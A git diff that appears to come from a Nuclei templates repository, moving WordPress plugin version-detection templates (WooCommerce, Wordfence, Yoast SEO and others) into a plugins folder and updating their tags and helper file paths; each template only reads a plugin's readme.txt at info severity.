similarity index 84% rename from technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml rename to technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cb9927b41d..fc9eee864e 100644 --- a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml +++ b/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -1,7 +1,7 @@ id: wordpress-woo-checkout-field-editor-pro info: - name: "Checkout Field Editor (Checkout Manager) for WooCommerce Detection" + name: Checkout Field Editor (Checkout Manager) for WooCommerce Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/woo-checkout-field-editor-pro/readme.txt" payloads: - last_version: wordpress-woo-checkout-field-editor-pro.txt + last_version: helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-woo-variation-swatches.yaml b/technologies/wordpress/plugins/woo-variation-swatches.yaml similarity index 86% rename from technologies/wordpress/wordpress-woo-variation-swatches.yaml rename to technologies/wordpress/plugins/woo-variation-swatches.yaml index 9249bc2a56..f5e1e955bc 100644 --- a/technologies/wordpress/wordpress-woo-variation-swatches.yaml +++ b/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -1,7 +1,7 @@ id: wordpress-woo-variation-swatches info: - name: "Variation Swatches for WooCommerce Detection" + name: Variation Swatches for WooCommerce Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/woo-variation-swatches/readme.txt" payloads: - last_version: wordpress-woo-variation-swatches.txt + last_version: helpers/wordpress/plugins/woo-variation-swatches.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml b/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml similarity index 85% rename from technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml rename to technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 885d5734e3..d6d8b8124c 100644 --- a/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml +++ b/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-gateway-paypal-express-checkout info: - name: "WooCommerce PayPal Checkout Payment Gateway Detection" + name: WooCommerce PayPal Checkout Payment Gateway Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-paypal-express-checkout/readme.txt" payloads: - last_version: wordpress-woocommerce-gateway-paypal-express-checkout.txt + last_version: helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml b/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml similarity index 85% rename from technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml rename to technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index b30dc38c4c..a41c8f0998 100644 --- a/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml +++ b/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-gateway-stripe info: - name: "WooCommerce Stripe Payment Gateway Detection" + name: WooCommerce Stripe Payment Gateway Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-stripe/readme.txt" payloads: - last_version: wordpress-woocommerce-gateway-stripe.txt + last_version: helpers/wordpress/plugins/woocommerce-gateway-stripe.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-woocommerce-payments.yaml b/technologies/wordpress/plugins/woocommerce-payments.yaml similarity index 83% rename from technologies/wordpress/wordpress-woocommerce-payments.yaml rename to technologies/wordpress/plugins/woocommerce-payments.yaml index 50b7520f74..4ef1e0eeb9 100644 --- a/technologies/wordpress/wordpress-woocommerce-payments.yaml +++ b/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-payments info: - name: "WooCommerce Payments – Fully Integrated Solution Built and Supported by Woo Detection" + name: WooCommerce Payments – Fully Integrated Solution Built and Supported by Woo Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/woocommerce-payments/readme.txt" payloads: - last_version: wordpress-woocommerce-payments.txt + last_version: helpers/wordpress/plugins/woocommerce-payments.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml b/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml similarity index 86% rename from technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml rename to technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f50880b40c..330e206ff9 100644 --- a/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml +++ b/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-paypal-payments info: - name: "WooCommerce PayPal Payments Detection" + name: WooCommerce PayPal Payments Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/woocommerce-paypal-payments/readme.txt" payloads: - last_version: wordpress-woocommerce-paypal-payments.txt + last_version: helpers/wordpress/plugins/woocommerce-paypal-payments.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml b/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml similarity index 85% rename from technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml rename to technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index b2cb953121..b1358aca99 100644 --- a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml +++ b/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-pdf-invoices-packing-slips info: - name: "PDF Invoices & Packing Slips for WooCommerce Detection" + name: PDF Invoices & Packing Slips for WooCommerce Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt" payloads: - last_version: wordpress-woocommerce-pdf-invoices-packing-slips.txt + last_version: helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-woocommerce-services.yaml b/technologies/wordpress/plugins/woocommerce-services.yaml similarity index 86% rename from technologies/wordpress/wordpress-woocommerce-services.yaml rename to technologies/wordpress/plugins/woocommerce-services.yaml index 28928e67b4..661c287524 100644 --- a/technologies/wordpress/wordpress-woocommerce-services.yaml +++ b/technologies/wordpress/plugins/woocommerce-services.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce-services info: - name: "WooCommerce Shipping & Tax Detection" + name: WooCommerce Shipping & Tax Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/woocommerce-services/readme.txt" payloads: - last_version: wordpress-woocommerce-services.txt + last_version: helpers/wordpress/plugins/woocommerce-services.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-woocommerce.yaml b/technologies/wordpress/plugins/woocommerce.yaml similarity index 87% rename from technologies/wordpress/wordpress-woocommerce.yaml rename to technologies/wordpress/plugins/woocommerce.yaml index 3e8499ab24..74ca69c270 100644 --- a/technologies/wordpress/wordpress-woocommerce.yaml +++ b/technologies/wordpress/plugins/woocommerce.yaml @@ -1,7 +1,7 @@ id: wordpress-woocommerce info: - name: "WooCommerce Detection" + name: WooCommerce Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" payloads: - last_version: wordpress-woocommerce.txt + last_version: helpers/wordpress/plugins/woocommerce.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-woosidebars.yaml b/technologies/wordpress/plugins/woosidebars.yaml similarity index 88% rename from technologies/wordpress/wordpress-woosidebars.yaml rename to technologies/wordpress/plugins/woosidebars.yaml index eb89e32bf5..89827ae59c 100644 --- a/technologies/wordpress/wordpress-woosidebars.yaml +++ b/technologies/wordpress/plugins/woosidebars.yaml @@ -1,7 +1,7 @@ id: wordpress-woosidebars info: - name: "WooSidebars Detection" + name: WooSidebars Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woosidebars wpscan: https://wpscan.com/plugin/woosidebars - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/woosidebars/readme.txt" payloads: - last_version: wordpress-woosidebars.txt + last_version: helpers/wordpress/plugins/woosidebars.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wordfence.yaml b/technologies/wordpress/plugins/wordfence.yaml similarity index 85% rename from technologies/wordpress/wordpress-wordfence.yaml rename to technologies/wordpress/plugins/wordfence.yaml index 2203f5c816..502ec9d41e 100644 --- a/technologies/wordpress/wordpress-wordfence.yaml +++ b/technologies/wordpress/plugins/wordfence.yaml @@ -1,7 +1,7 @@ id: wordpress-wordfence info: - name: "Wordfence Security – Firewall & Malware Scan Detection" + name: Wordfence Security – Firewall & Malware Scan Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wordfence/readme.txt" payloads: - last_version: wordpress-wordfence.txt + last_version: helpers/wordpress/plugins/wordfence.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wordpress-importer.yaml b/technologies/wordpress/plugins/wordpress-importer.yaml similarity index 87% rename from technologies/wordpress/wordpress-wordpress-importer.yaml rename to technologies/wordpress/plugins/wordpress-importer.yaml index 8e5495f175..d1b26d88a1 100644 --- a/technologies/wordpress/wordpress-wordpress-importer.yaml +++ b/technologies/wordpress/plugins/wordpress-importer.yaml @@ -1,7 +1,7 @@ id: wordpress-wordpress-importer info: - name: "WordPress Importer Detection" + name: WordPress Importer Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt" payloads: - last_version: wordpress-wordpress-importer.txt + last_version: helpers/wordpress/plugins/wordpress-importer.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wordpress-seo.yaml b/technologies/wordpress/plugins/wordpress-seo.yaml similarity index 87% rename from technologies/wordpress/wordpress-wordpress-seo.yaml rename to technologies/wordpress/plugins/wordpress-seo.yaml index 3a4c46d40c..8f36ef8ad3 100644 --- a/technologies/wordpress/wordpress-wordpress-seo.yaml +++ b/technologies/wordpress/plugins/wordpress-seo.yaml @@ -1,7 +1,7 @@ id: wordpress-wordpress-seo info: - name: "Yoast SEO Detection" + name: Yoast SEO Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wordpress-seo/readme.txt" payloads: - last_version: wordpress-wordpress-seo.txt + last_version: helpers/wordpress/plugins/wordpress-seo.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-worker.yaml b/technologies/wordpress/plugins/worker.yaml similarity index 87% rename from technologies/wordpress/wordpress-worker.yaml rename to technologies/wordpress/plugins/worker.yaml index aa330744ce..5bcfe0eb5f 100644 --- a/technologies/wordpress/wordpress-worker.yaml +++ b/technologies/wordpress/plugins/worker.yaml @@ -1,7 +1,7 @@ id: wordpress-worker info: - name: "ManageWP Worker Detection" + name: ManageWP Worker Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/worker/readme.txt" payloads: - last_version: wordpress-worker.txt + last_version: helpers/wordpress/plugins/worker.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-fastest-cache.yaml b/technologies/wordpress/plugins/wp-fastest-cache.yaml similarity index 87% rename from technologies/wordpress/wordpress-wp-fastest-cache.yaml rename to technologies/wordpress/plugins/wp-fastest-cache.yaml index bae8881b3b..e9f00650ff 100644 --- a/technologies/wordpress/wordpress-wp-fastest-cache.yaml +++ b/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-fastest-cache info: - name: "WP Fastest Cache Detection" + name: WP Fastest Cache Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" payloads: - last_version: wordpress-wp-fastest-cache.txt + last_version: helpers/wordpress/plugins/wp-fastest-cache.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-file-manager.yaml b/technologies/wordpress/plugins/wp-file-manager.yaml similarity index 87% rename from technologies/wordpress/wordpress-wp-file-manager.yaml rename to technologies/wordpress/plugins/wp-file-manager.yaml index 97443a8b4b..bef457673c 100644 --- a/technologies/wordpress/wordpress-wp-file-manager.yaml +++ b/technologies/wordpress/plugins/wp-file-manager.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-file-manager info: - name: "File Manager Detection" + name: File Manager Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt" payloads: - last_version: wordpress-wp-file-manager.txt + last_version: helpers/wordpress/plugins/wp-file-manager.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-google-maps.yaml b/technologies/wordpress/plugins/wp-google-maps.yaml similarity index 86% rename from technologies/wordpress/wordpress-wp-google-maps.yaml rename to technologies/wordpress/plugins/wp-google-maps.yaml index 366797b908..7d79c1073f 100644 --- a/technologies/wordpress/wordpress-wp-google-maps.yaml +++ b/technologies/wordpress/plugins/wp-google-maps.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-google-maps info: - name: "WP Go Maps (formerly WP Google Maps) Detection" + name: WP Go Maps (formerly WP Google Maps) Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-google-maps/readme.txt" payloads: - last_version: wordpress-wp-google-maps.txt + last_version: helpers/wordpress/plugins/wp-google-maps.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-mail-smtp.yaml b/technologies/wordpress/plugins/wp-mail-smtp.yaml similarity index 83% rename from technologies/wordpress/wordpress-wp-mail-smtp.yaml rename to technologies/wordpress/plugins/wp-mail-smtp.yaml index d50965dd70..9971b66d8b 100644 --- a/technologies/wordpress/wordpress-wp-mail-smtp.yaml +++ b/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-mail-smtp info: - name: "WP Mail SMTP by WPForms – The Most Popular SMTP and Email Log Plugin Detection" + name: WP Mail SMTP by WPForms – The Most Popular SMTP and Email Log Plugin Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp/readme.txt" payloads: - last_version: wordpress-wp-mail-smtp.txt + last_version: helpers/wordpress/plugins/wp-mail-smtp.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-maintenance-mode.yaml b/technologies/wordpress/plugins/wp-maintenance-mode.yaml similarity index 83% rename from technologies/wordpress/wordpress-wp-maintenance-mode.yaml rename to technologies/wordpress/plugins/wp-maintenance-mode.yaml index facb415b8b..4255f4dcfe 100644 --- a/technologies/wordpress/wordpress-wp-maintenance-mode.yaml +++ b/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-maintenance-mode info: - name: "LightStart – Maintenance Mode, Coming Soon and Landing Page Builder Detection" + name: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-maintenance-mode/readme.txt" payloads: - last_version: wordpress-wp-maintenance-mode.txt + last_version: helpers/wordpress/plugins/wp-maintenance-mode.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-migrate-db.yaml b/technologies/wordpress/plugins/wp-migrate-db.yaml similarity index 85% rename from technologies/wordpress/wordpress-wp-migrate-db.yaml rename to technologies/wordpress/plugins/wp-migrate-db.yaml index dbd4811fe2..149a311895 100644 --- a/technologies/wordpress/wordpress-wp-migrate-db.yaml +++ b/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-migrate-db info: - name: "WP Migrate Lite – WordPress Migration Made Easy Detection" + name: WP Migrate Lite – WordPress Migration Made Easy Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/readme.txt" payloads: - last_version: wordpress-wp-migrate-db.txt + last_version: helpers/wordpress/plugins/wp-migrate-db.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-multibyte-patch.yaml b/technologies/wordpress/plugins/wp-multibyte-patch.yaml similarity index 87% rename from technologies/wordpress/wordpress-wp-multibyte-patch.yaml rename to technologies/wordpress/plugins/wp-multibyte-patch.yaml index da742948dd..1ccdc68aae 100644 --- a/technologies/wordpress/wordpress-wp-multibyte-patch.yaml +++ b/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-multibyte-patch info: - name: "WP Multibyte Patch Detection" + name: WP Multibyte Patch Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-multibyte-patch/readme.txt" payloads: - last_version: wordpress-wp-multibyte-patch.txt + last_version: helpers/wordpress/plugins/wp-multibyte-patch.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-optimize.yaml b/technologies/wordpress/plugins/wp-optimize.yaml similarity index 85% rename from technologies/wordpress/wordpress-wp-optimize.yaml rename to technologies/wordpress/plugins/wp-optimize.yaml index 3c25b10514..ae72975a78 100644 --- a/technologies/wordpress/wordpress-wp-optimize.yaml +++ b/technologies/wordpress/plugins/wp-optimize.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-optimize info: - name: "WP-Optimize – Cache, Clean, Compress. Detection" + name: WP-Optimize – Cache, Clean, Compress. Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-optimize/readme.txt" payloads: - last_version: wordpress-wp-optimize.txt + last_version: helpers/wordpress/plugins/wp-optimize.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-pagenavi.yaml b/technologies/wordpress/plugins/wp-pagenavi.yaml similarity index 87% rename from technologies/wordpress/wordpress-wp-pagenavi.yaml rename to technologies/wordpress/plugins/wp-pagenavi.yaml index d28f0159a1..98514a8473 100644 --- a/technologies/wordpress/wordpress-wp-pagenavi.yaml +++ b/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-pagenavi info: - name: "WP-PageNavi Detection" + name: WP-PageNavi Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-pagenavi/readme.txt" payloads: - last_version: wordpress-wp-pagenavi.txt + last_version: helpers/wordpress/plugins/wp-pagenavi.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-reset.yaml b/technologies/wordpress/plugins/wp-reset.yaml similarity index 85% rename from technologies/wordpress/wordpress-wp-reset.yaml rename to technologies/wordpress/plugins/wp-reset.yaml index bbfd45b3b3..9de95aa368 100644 --- a/technologies/wordpress/wordpress-wp-reset.yaml +++ b/technologies/wordpress/plugins/wp-reset.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-reset info: - name: "WP Reset – Most Advanced WordPress Reset Tool Detection" + name: WP Reset – Most Advanced WordPress Reset Tool Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt" payloads: - last_version: wordpress-wp-reset.txt + last_version: helpers/wordpress/plugins/wp-reset.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-sitemap-page.yaml b/technologies/wordpress/plugins/wp-sitemap-page.yaml similarity index 87% rename from technologies/wordpress/wordpress-wp-sitemap-page.yaml rename to technologies/wordpress/plugins/wp-sitemap-page.yaml index d9b20aa1ef..f18d0ebc57 100644 --- a/technologies/wordpress/wordpress-wp-sitemap-page.yaml +++ b/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-sitemap-page info: - name: "WP Sitemap Page Detection" + name: WP Sitemap Page Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-sitemap-page/readme.txt" payloads: - last_version: wordpress-wp-sitemap-page.txt + last_version: helpers/wordpress/plugins/wp-sitemap-page.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-smushit.yaml b/technologies/wordpress/plugins/wp-smushit.yaml similarity index 84% rename from technologies/wordpress/wordpress-wp-smushit.yaml rename to technologies/wordpress/plugins/wp-smushit.yaml index 64f1a2cbec..dde7732294 100644 --- a/technologies/wordpress/wordpress-wp-smushit.yaml +++ b/technologies/wordpress/plugins/wp-smushit.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-smushit info: - name: "Smush – Lazy Load Images, Optimize & Compress Images Detection" + name: Smush – Lazy Load Images, Optimize & Compress Images Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-smushit/readme.txt" payloads: - last_version: wordpress-wp-smushit.txt + last_version: helpers/wordpress/plugins/wp-smushit.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-statistics.yaml b/technologies/wordpress/plugins/wp-statistics.yaml similarity index 88% rename from technologies/wordpress/wordpress-wp-statistics.yaml rename to technologies/wordpress/plugins/wp-statistics.yaml index e65ec7d065..2dbea46272 100644 --- a/technologies/wordpress/wordpress-wp-statistics.yaml +++ b/technologies/wordpress/plugins/wp-statistics.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-statistics info: - name: "WP Statistics Detection" + name: WP Statistics Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" payloads: - last_version: wordpress-wp-statistics.txt + last_version: helpers/wordpress/plugins/wp-statistics.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-wp-super-cache.yaml b/technologies/wordpress/plugins/wp-super-cache.yaml similarity index 87% rename from technologies/wordpress/wordpress-wp-super-cache.yaml rename to technologies/wordpress/plugins/wp-super-cache.yaml index 5513b4121b..21ae70f0cd 100644 --- a/technologies/wordpress/wordpress-wp-super-cache.yaml +++ b/technologies/wordpress/plugins/wp-super-cache.yaml @@ -1,7 +1,7 @@ id: wordpress-wp-super-cache info: - name: "WP Super Cache Detection" + name: WP Super Cache Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/wp-super-cache/readme.txt" payloads: - last_version: wordpress-wp-super-cache.txt + last_version: 